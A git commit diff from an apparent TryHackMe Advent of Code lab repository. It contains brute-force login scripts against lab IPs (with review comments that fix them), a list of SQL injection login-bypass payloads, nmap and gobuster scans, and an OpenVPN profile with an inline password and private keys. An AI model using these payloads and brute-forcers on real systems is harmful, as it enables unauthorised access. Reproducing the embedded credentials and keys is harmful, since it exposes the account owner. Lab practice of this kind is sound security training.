2026-03-11

2026-03-11 10:56:27 +01:00
parent 1b6dfea090
commit 0e30222666
37 changed files with 4467 additions and 0 deletions


@@ -0,0 +1 @@
DeployMaster2025

BIN
AoC/2025/21/NorthPole.zip Normal file

Binary file not shown.

File diff suppressed because it is too large Load Diff

1
AoC/2025/21/zip_pass.txt Normal file

@@ -0,0 +1 @@
CanYouREM3?

Binary file not shown.

10
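--- a/AoC/2025/24/bruteforce.sh
+++ b/AoC/2025/24/bruteforce.sh
@@ -0,0 +1,10 @@
+for word in $(cat /usr/share/wordlists/rockyou.txt); do
+response=$(curl -s -A "secretcomputer" -X POST -d "username=admin&password=$word" http://10.82.144.99/terminal.php?action=login)
+#echo $response
+status=$(echo $response | jq -e ".status" | tr -d '"')
+printf "Checking %s with status %s \r" "$word" "$status"
+if [ "$status" != "fail" ]; then
+echo "Credentials are admin:$word"
+break
+fi
+done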
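Review bot: The check `if [ "$status" != "fail" ]` counts any response other than the literal `fail` as a hit, so a failed `curl`, an empty body or a non-JSON page (a lockout or rate-limit response, for instance) leaves `status` empty and the loop stops on a false result. Require a parsed value before comparing, e.g. `if [ -n "$status" ] && [ "$status" != "fail" ]; then`, and read it with `jq -r '.status'` instead of `jq -e … | tr -d '"'`. `echo $response` is unquoted, so the body is word-split and glob-expanded before `jq` sees it; `printf '%s' "$response" | jq …` passes it through unchanged. The file is committed as executable but has no shebang line, so the interpreter depends on how it is launched.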

5
AoC/2025/24/cookie.txt Normal file

@@ -0,0 +1,5 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
10.82.144.99 FALSE / FALSE 0 PHPSESSID r6grvo93glp6pc1ocqkvfrcelp

49
AoC/2025/24/username.py Normal file

@@ -0,0 +1,49 @@
import requests
import json
import os
#{
# "service": "Wormhole Control Panel",
# "endpoints": {
# "\/terminal.php?action=info": "Public info",
# "\/terminal.php?action=login": "POST: username,password",
# "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
# "\/terminal.php?action=status": "GET: wormhole status",
# "\/terminal.php?action=close": "POST: close wormhole"
# },
# "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
#}
def main():
wordlist = "/usr/share/wordlists/rockyou.txt"
url = "10.81.152.59"
proto = "http"
target = "terminal.php?action=login"
user_agent = "secretcomputer"
headers = {"User-Agent": user_agent}
username = ["user", "admin"]
lines = int(os.popen(f"wc -l {wordlist}").read().split()[0])
print(lines)
count = 0
try:
with open(wordlist, 'r') as file:
for user in username:
for word in file:
count += 1
print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r")
data = {"username": user, "password": word}
response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json()
if isinstance(response, dict):
if response["status"] != "fail":
print(f"Credentials found: {user}:{password}")
except FileNotFoundError:
print("File not found")
return
except Exception as e:
print(f"An Error occured: {e}")
return
if __name__ == "__main__":
main()
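Review bot: The success branch formats `{user}:{password}`, but `main()` never defines `password` (the loop variable is `word`), so any non-`fail` response raises NameError, which the broad `except Exception` reports as "An Error occured" before returning without showing the result. Use `word` there, and strip the line ending when reading (`word = word.rstrip("\n")`), because the raw line with its newline is what gets posted. The inner `for word in file` also exhausts the file handle on the first pass of `for user in username`, so the second username is never tried; `file.seek(0)` at the top of the outer loop would fix that. `requests.post(...)` has no `timeout=`, so a stalled connection hangs the run, and `os.popen(f"wc -l {wordlist}")` goes through a shell where `sum(1 for _ in open(wordlist, "rb"))` would not.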

2
AoC/2025/24/username.txt Normal file

@@ -0,0 +1,2 @@
user
admin


@@ -0,0 +1,33 @@
Johnnyboy1982!
Johnnyboy1982@
Johnnyboy1982#
Johnnyboy1982$
Johnnyboy1982%
Johnnyboy1982^
Johnnyboy1982&
Johnnyboy1982*
Johnnyboy1982(
Johnnyboy1982)
Johnnyboy1982-
Johnnyboy1982_
Johnnyboy1982+
Johnnyboy1982=
Johnnyboy1982~
Johnnyboy1982`
Johnnyboy1982[
Johnnyboy1982]
Johnnyboy1982{
Johnnyboy1982}
Johnnyboy1982|
Johnnyboy1982\
Johnnyboy1982:
Johnnyboy1982;
Johnnyboy1982"
Johnnyboy1982'
Johnnyboy1982<
Johnnyboy1982>
Johnnyboy1982,
Johnnyboy1982.
Johnnyboy1982?
Johnnyboy1982/
Johnnyboy1982

BIN
AoC/2025/sq2/4.2.0.zip Normal file

Binary file not shown.

BIN
AoC/2025/sq2/gobuster.txt Normal file

Binary file not shown.

BIN
AoC/2025/sq2/latest/beacon.bin Executable file

Binary file not shown.


@@ -0,0 +1,70 @@
# Nmap 7.95 scan initiated Tue Dec 9 19:51:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap-scan.txt 10.82.170.160
Nmap scan report for 10.82.170.160
Host is up (0.041s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f6:ad:e2:2c:8b:d4:f6:f8:1d:47:c8:56:81:ca:f0:86 (ECDSA)
|_ 256 2d:c7:95:46:a2:df:45:9d:bc:8a:5c:a7:2f:a6:4f:23 (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Under Construction
9004/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, RPCCheck, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| Payload Storage Malhare's
| Version 4.2.0
| >>Invalid option
| GenericLines, NULL:
| Payload Storage Malhare's
|_ Version 4.2.0
21337/tcp open http Werkzeug httpd 3.0.1 (Python 3.12.3)
|_http-server-header: Werkzeug/3.0.1 Python/3.12.3
|_http-title: Unlock Hopper's Memories
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9004-TCP:V=7.95%I=7%D=12/9%Time=69386FDC%P=aarch64-unknown-linux-gn
SF:u%r(NULL,46,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]
SF:\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(JavaRMI,55,"Paylo
SF:ad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U
SF::\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(GenericLines,46,
SF:"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\
SF:]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(GetRequest,55,"Payload\x20Sto
SF:rage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\
SF:x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(HTTPOptions,55,"Payload\x
SF:20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\
SF:[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RTSPRequest,55,"Payl
SF:oad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20
SF:U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RPCCheck,55,"Pa
SF:yload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x
SF:20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(DNSVersionBin
SF:dReqTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\
SF:x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r
SF:(DNSStatusRequestTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\
SF:.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x2
SF:0option\n")%r(Help,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2
SF:\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20o
SF:ption\n")%r(SSLSessionReq,55,"Payload\x20Storage\x20Malhare's\nVersion\
SF:x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Inval
SF:id\x20option\n")%r(TerminalServerCookie,55,"Payload\x20Storage\x20Malha
SF:re's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\
SF:x20E:\n>>Invalid\x20option\n")%r(TLSSessionReq,55,"Payload\x20Storage\x
SF:20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\
SF:n\[4\]\x20E:\n>>Invalid\x20option\n")%r(Kerberos,55,"Payload\x20Storage
SF:\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D
SF::\n\[4\]\x20E:\n>>Invalid\x20option\n");
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 43.94 ms 192.168.128.1
2 ...
3 44.79 ms 10.82.170.160
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 9 19:52:26 2025 -- 1 IP address (1 host up) scanned in 52.64 seconds


@@ -0,0 +1,13 @@
/index.php  (Status: 200) [Size: 6588]
/login.php  (Status: 200) [Size: 5401]
/mail.log  (Status: 200) [Size: 1098]
/flags  (Status: 301) [Size: 314] [--> http://10.82.175.205/flags/]
/css  (Status: 301) [Size: 312] [--> http://10.82.175.205/css/]
/js  (Status: 301) [Size: 311] [--> http://10.82.175.205/js/]
/javascript  (Status: 301) [Size: 319] [--> http://10.82.175.205/javascript/]
/logout.php  (Status: 302) [Size: 0] [--> index.php]
/vendor  (Status: 301) [Size: 315] [--> http://10.82.175.205/vendor/]
/dashboard.php  (Status: 302) [Size: 0] [--> dashboard.php]
/functions.php  (Status: 200) [Size: 0]
/phpmyadmin  (Status: 301) [Size: 319] [--> http://10.82.175.205/phpmyadmin/]
/conn.php  (Status: 200) [Size: 0]


@@ -0,0 +1,32 @@
# Nmap 7.95 scan initiated Fri Dec 12 11:49:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.175.205
Nmap scan report for 10.82.175.205
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 27:7b:ea:74:bf:6d:16:89:c8:54:28:1e:c8:2b:f1:56 (RSA)
| 256 37:2b:c1:36:20:7e:17:bf:83:b3:3d:3e:06:3e:12:a4 (ECDSA)
|_ 256 fd:87:f9:03:11:6c:d9:3c:fc:d1:d3:88:b3:bf:c7:91 (ED25519)
80/tcp open http Apache httpd 2.4.41
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Injectics Leaderboard
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 3 hops
Service Info: Host: ip-10-82-175-205.eu-west-1.compute.internal; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 39.12 ms 192.168.128.1
2 ...
3 40.22 ms 10.82.175.205
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec 12 11:50:22 2025 -- 1 IP address (1 host up) scanned in 49.22 seconds


@@ -0,0 +1,198 @@
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
==
=
'
' --
' #
'
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
or 1=1
or true
' or ''='
" or ""="
1) and '1='1
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
and 1=1
and 1=1
' and 'one'='one
' and 'one'='one
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
or 0=0 --
or 0=0 #
or 0=0
' or 0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0
" or 0=0 --
" or 0=0 #
" or 0=0
%' or '0'='0
or 1=1
or 1=1--
or 1=1/*
or 1=1#
or 1=1
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1='1
' or 1=1
' or 1=1 --
' or 1=1
' or 1=1--
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1='1
) or ('1='1
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or 'a'='a
' or a=a--
' or a=a
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
' or 'x'='x
') or ('x'='x
" or "x"="x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
' or 1=1 limit 1 -- -+
'="or'

131
TryHackMe.ovpn Normal file

@@ -0,0 +1,131 @@
client
dev tun
proto udp
remote ga-eu-west-1-vpn.vm.tryhackme.com 1194
resolv-retry infinite
nobind
persist-key
persist-tun
auth-user-pass
<auth-user-pass>
6751e250fca37178fb3202da
cd4112418a2d993b6f2290e96b74d4df
</auth-user-pass>
remote-cert-tls server
verify-x509-name openvpn-server name
data-ciphers AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305
auth SHA256
explicit-exit-notify 1
verb 3
<ca>
-----BEGIN CERTIFICATE-----
MIIFCzCCAvOgAwIBAgIUOr05T3QAQ/evssMZTXqD31VQdMEwDQYJKoZIhvcNAQEL
BQAwFTETMBEGA1UEAwwKT3BlblZQTi1DQTAeFw0yNTEwMzExMzA1MjZaFw0zNTEw
MjkxMzA1MjZaMBUxEzARBgNVBAMMCk9wZW5WUE4tQ0EwggIiMA0GCSqGSIb3DQEB
AQUAA4ICDwAwggIKAoICAQClsYy5qvtax0Kk/qO1m3wSiWAX9e1GP8Kfwh/ygXUQ
18mANG3fF4INAkBQxaYzHIlHJFt1q3jJob3uOprbKDr8b6IxclqblaTlxLrePlwN
nJkyME4FB24rgX3i9NE+oRez2J+7+LEqP5z4hVDb9K/xl2NnRBkSGV0hhZPJd/Yq
ZAu4FuEyz6RORHHNuXTUeqSqNVuV0nFp1yw7Q//Gvm4s6fuoSd6o11glXEA4ViL3
+ScoMJZJZkkZwgZai18QMuyCSveR6kywtxGEofH6AXzgJBAoSUi8Th6ePsT74sAY
+QR42cV0hSzOBgmNAkk9mtEmKeU0EkeCZCGmse+aF3Hmam1ZU3FgLIH1GA9ll9aJ
e8MqA90QlnsUS9P5DcWTjIbccrMqK1oh8GA9JnYWcOt2kCUhUhMFKZkJuSwdKrud
oMBCjNq5mReDASvlHjvga3MFyIsbupDr2tB/WmFJ58vcD6cJiDDFdCHlgFJOPnoN
8UG6ii7bAA1Wx2UmtrGXN/6JTPkWp9XHEi/SUpIXNihodng+nVgBNx9nm6Nokydu
XkYVwW+1FAlrdqkXhNzsA++GDFqcSLmk5OvaMXB8ChJuaEn/WWzBlPXu8Zx5FMwd
0+6LlxdIYwX66wOnsSewnwzVgL2pyaQxc/adaK3BNuYwb1+eOfJ1fCRyKzVvUfGj
ewIDAQABo1MwUTAdBgNVHQ4EFgQUKQ9UEDD6nE7aC9FTICd9613MJc8wHwYDVR0j
BBgwFoAUKQ9UEDD6nE7aC9FTICd9613MJc8wDwYDVR0TAQH/BAUwAwEB/zANBgkq
hkiG9w0BAQsFAAOCAgEAE6m+Nmn1YVGmK68Tta4sWVahkzDdlPtFs+3Ebbk/I9CJ
pX+NXq1ibu4HoBtSmsNeOebvxx9YdcQ6OZbtDQcCaUmjmZ+AsJDsubZ746JcIoOf
sAfKSyI4LL+oGOA+k6fs5JQjPnMRqt5wBcWhQW+z0VEvutJ33pO8KNgEgZCSfFkk
rlUNHFfLxYFDJaVxtSH8XZHB74Sz6FMdB745+tviit2k/EtnOV2Ak41zo2PvQYhq
NFNjqpFqdh9jUjoGJrf8/fN+b3IEmoDRRYLIAD2Bq+1GxdK60J8PEQ1HL/u0JUyy
ktLfLdO6yK/YSpOjDkYSmRD/rva/WCi2Jjw6Bs7XfhKdYA/CCk1ic/QpqSNMyO0w
4DrombXHp9UF0jQOfAQKYxJnMvvJpzjtsEzgVWsg7CUUoOtbUSjsz2USS0fJHiwi
KcZSpFuyX33jhoNPDoYHPksi2fm0J5t6jusFyeNfmeb045XFHI9obF+Jm5FtXXYk
ues0mllRVt8cysFR+LSlGZdNbcYhLC9jhxGKkiCGqSwYTm3h+r/foF1f2imL2s33
u7RvTf8ZCoWtFZIOo0/0JZhIactJVD64Tv1sMvpkgiT7d5l0ggucWMiEfxikw8V/
zFGmIiuGBiJmoMJnT3tGf9pUpQ2hCq7U/nx5OTBTDvDhzdzJFnfZ2UBHj4h2MNE=
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
MIIEJDCCAgygAwIBAgIUD7mJmq+vTOSt/JCTWMra9O39HR4wDQYJKoZIhvcNAQEL
BQAwFTETMBEGA1UEAwwKT3BlblZQTi1DQTAeFw0yNTEwMzExMzA1MjZaFw0yODEw
MzAxMzA1MjZaMBIxEDAOBgNVBAMMB2NsaWVudDEwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQDpZKNtpUEOdgu4+2jnDt2r95VIx9/mM86Wj+SPUiT87/og
IEUrI/2DEcM0VxPzdbM6RAlp41wwQwKrCsdRqjfkypPM6qMP6O1VVPrG4c/Guaae
1xKAhVYdPu1AwAJG/pPQbDzN2ybTtCUC3b1UDA8pnl0sxfvzfuOk5uxv1ed+qDm9
pwiML5AqdSuLW11mSGUpTzhUqZLLDvAl0l6QJW61nm2AIaiUco6sMc0k1UvAJb83
jSWXaK0qPTLQT2Bqtbuq6cb8y1aLiQ5MPqNCZNM6bx5QFLPWb0572wx6+pJnadFJ
TkrrkxxAHQCnXlGd6iCM6W/KgWqxbu/CvKo/w7CxAgMBAAGjbzBtMAkGA1UdEwQC
MAAwCwYDVR0PBAQDAgWgMBMGA1UdJQQMMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSl
Rx6m99UpK7tnOukyr1ZGIsFcYjAfBgNVHSMEGDAWgBQpD1QQMPqcTtoL0VMgJ33r
XcwlzzANBgkqhkiG9w0BAQsFAAOCAgEAie8+t6I3zaJ2QJE9hSSEAuosF7FKFmp9
oLYqCh7teSvGL8taN4FS8OcAS/5o0SSGbKbmE/gZb4MWwDNWx9fatJ3G+cWp3YVN
hk53ptqShov3UvfpIFTiaDhOtnjIhOHZTyCf3UvQ6CKyK70bJd54+sqbl65C3ye0
KzdndU0WCThx5OVSni4j1ij7gf9h+InhwOD6D5H7DyF3gPHIqMy2KgCKvQl9rcfB
w8gQD6sIwbS+a9mys07nIfzL8Jl1H93sWsoVvjYCIy10Bj+5ikulP25mB0FajP4S
iuTJCSSxq6RlbdBnqti9NvxpUvDPqlUbZXgZAG+v80zRYcfAN0NaNJKfh+bkqLZk
PfPj9jWmGHrXHs0rPhGzBfgGPlcAGdL+CRIEXax9fw1D4Ywiq5gcsCcLxWDJveAl
Grwtn9l2sPKxBT1umscSp54qK+HXRr1jHzJWSQD2Ko2qefINCPn0vF99PJZWfHIj
YTQ8iM6UeYdu1XmsccICjkSnmG9SlTVUmONiXt0+zRp3OXzTuVEfv0M9Dl5PaUjz
GyVrHAhUHGKYHTmF8UiAivLs8EYisGuetplRDWaMD1GRVwTDUlxAcIGVh2xj2XxT
3yAOzPCfIDrS0i4VgrbBE64jhprgLaxgTgDUNjEB63z1Lt5IPUPb7bpw7LjOyMoH
o4N+otVx7f0=
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDpZKNtpUEOdgu4
+2jnDt2r95VIx9/mM86Wj+SPUiT87/ogIEUrI/2DEcM0VxPzdbM6RAlp41wwQwKr
CsdRqjfkypPM6qMP6O1VVPrG4c/Guaae1xKAhVYdPu1AwAJG/pPQbDzN2ybTtCUC
3b1UDA8pnl0sxfvzfuOk5uxv1ed+qDm9pwiML5AqdSuLW11mSGUpTzhUqZLLDvAl
0l6QJW61nm2AIaiUco6sMc0k1UvAJb83jSWXaK0qPTLQT2Bqtbuq6cb8y1aLiQ5M
PqNCZNM6bx5QFLPWb0572wx6+pJnadFJTkrrkxxAHQCnXlGd6iCM6W/KgWqxbu/C
vKo/w7CxAgMBAAECggEAGeV+g7s/G3NqLBGLS335Byx+vjddRs3vSYH4TpXDAGTB
OGDUQ+vnpGwrYGqcDlq8MwYbFEpzr3A0AtX8lTlhn8uBeE59ntWNxfbap4glNYvi
asP669M/oZmamiFj70wuiwUDfyTmqz1VEPsZF5MJ+Kh3drEWGme1KxYrXGJb4A/k
poXqT6B2iAXGF0FLvgoCAPS7oM8xQcdnLPWdeIoClxkEVutU3+Ks5vVkRPHjnCnc
deZZDU9gMZZSpa/TS+rDS2LyMc36HPhvJWe8+Py0HwhQ11FvWZma6FMVDy0puU9s
wMOWI5vg8/D3R0xgtyXhVZ/0iIxtWqp/pI0ihniCZQKBgQD9gexbSz8d+NxF8ZTA
8WW8vAyhJJRHSj0l6Des/nq43WjObhoU+OVmYhre7yM4md2Ro07pTjVOpxLcrtLB
gUL1CrPHnc6frd9JgKIJ6HUYXTAYFwDDFp2FMWFFKU1H0QLqW2a5YA3xGODm+nj5
dNgQYmCFYCH/m/KuX1EAYR8D9QKBgQDrsBZbERYcDFuFsXR6hmiVgWpQ72+ef9ZA
+TM2Nwquw74xCA+Fw7feQgjyOpVfSWZRVoAxePeb6STjmcYF8FZrebuEdmastg5h
NzOR7IpT5BG/JhEA83dl244EP9Q/uA+uHGyp1pN342grO7UIwVhinY5bqQMbKnj6
tE1txYGATQKBgB0MxF750nPGzscdFeS+ROBJ1FCq9mrs8PDlGWwzhTCl/pqZN1fr
5a3D1Dxzvt9/kkpcInDNy4IF1z1+sxwFify2iz92r/TQYeP0X50vDCwMkbRQ/n9c
mhRnQjRAtWBjbSgZ7T2U6kQUi8EsNqyvXQsTmuftyjeWUUr2FTwr5Pf5AoGBAOjK
DNq33qmnfwJnCxA2D7iTkcoNJKddxuZ3/SAwb2m8xu8w8fwCG2r4uFNgj8cE/X2b
PZUf0Rl6x0fSy6d0Aje3jgJA3Br82ukkl9gq1VoU635sf+D7mNPPbs89qEujZkFn
q+B4o0GIKIyDNcVHCyCkVEaugfXkFogxbETfDpEFAoGAHEDY+NM95kqAADep9O5P
ZOp3r5y7DdgSkBOYeQeyI9/3l9PctMJkklJKKaPI1bTH9gswTiCBCV2bsxdTUsOk
vVkLhPHCvAc3nz83uTu2+x6GK7XF9G6qIgudYbHcphLFSFwLEUGkuENT7+YTYcce
FpCwrgkEI5UfX7WeZDxPzeI=
-----END PRIVATE KEY-----
</key>
<tls-crypt>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
d817bc3c9ac4014f17bbf3aead5f2379
52ce9f54592c6bdc070af9fff878b142
e8210588b6f8c2b80b5c9bc588854516
c5d32cdc806ebaa2dee681dc861ad504
634eecd94fae850d5d617a0abc4e7819
93c7a3d505cfc28678c54a1e85a54035
ce3053a412cf385408038ca8eacdd48d
1d8a9eef60fc3c01ebf5a6fdb0184cfd
24e1088a241dfb474110116a85e88fef
cbd0348050170dd39a9ede3e0731e113
b2a95c526dde09744f396ceaddb9dc0c
1f514fc04ac33407124f6fe4a86aabc8
1cda5b5be56de4fbb5b16c9a728210cd
3b03f51dfa6ecff2694f6b6e1458b12f
e4ef409b3c569f3339aa469cb20ac537
d9c87f6f7ae372e2ea2c28b27ffd9fa7
-----END OpenVPN Static key V1-----
</tls-crypt>
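Review bot: This profile is committed with live secrets inline: the `<auth-user-pass>` block holds a username/password pair, `<key>` holds the client's private key and `<tls-crypt>` holds the static key, so anyone who can read the repository or its history can connect as this client. Keep the profile out of version control (for example a `*.ovpn` entry in `.gitignore`) and point `auth-user-pass` at a separate untracked credentials file. Because the values are already in history, deleting the file in a later commit does not withdraw them; the profile should be regenerated and the old certificate and credentials revoked.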

Binary file not shown.


@@ -0,0 +1,3 @@
index.php  (Status: 200) [Size: 2424]
server.php  (Status: 200) [Size: 2424]
cve.php  (Status: 200) [Size: 85]


@@ -0,0 +1 @@
10.81.136.171


@@ -0,0 +1,118 @@
# Nmap 7.98 scan initiated Fri Jan 16 17:37:03 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p8089 -oN nmap_8089.txt 10.81.136.171
Nmap scan report for 10.81.136.171
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
8089/tcp open http (PHP 7.2.10)
|_http-title: Laravel
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Date: Fri, 16 Jan 2026 16:37:24 +0000
| Connection: close
| X-Powered-By: PHP/7.2.10
| Cache-Control: no-cache, private
| date: Fri, 16 Jan 2026 16:37:24 GMT
| Content-type: text/html; charset=UTF-8
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Page Not Found</title>
| <!-- Fonts -->
| <link href="https://fonts.googleapis.com/css?family=Raleway:100,600" rel="stylesheet" type="text/css">
| <!-- Styles -->
| <style>
| html, body {
| background-color: #fff;
| color: #636b6f;
| font-family: 'Raleway', sans-serif;
| font-weight: 100;
| height: 100vh;
| margin: 0;
| GetRequest:
| HTTP/1.0 200 OK
| Date: Fri, 16 Jan 2026 16:37:15 +0000
| Connection: close
| X-Powered-By: PHP/7.2.10
| Cache-Control: private, must-revalidate
| Date: Fri, 16 Jan 2026 16:37:15 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
| expires: -1
| Set-Cookie: XSRF-TOKEN=eyJpdiI6IlFKTnFvQnJsY2tYRlY3SDlCQmZhXC9nPT0iLCJ2YWx1ZSI6Im5HRzJwM2pDNzN2eDQ5TUc4NVYxbnJ2OVpPRXQ1a1hJZGJ1MGt0NHYxVDdFUFhleUJyWHM3U09qTlJQMnEwem4xOTFnVjJwT2JlczBsQlVtWlRIMEpBPT0iLCJtYWMiOiJiODYzNDBlYTNjMjYzYjIyZGQzNTdiMGQ0OTA2YTBiMzk1OTQ1OTQzODZjOGFmMDkwOTA3Yjk0MmI5OGZlZjE1In0%3D; expires=Fri, 16-Jan-2026 18:37:15 GMT; Max-Age=7200; path=/
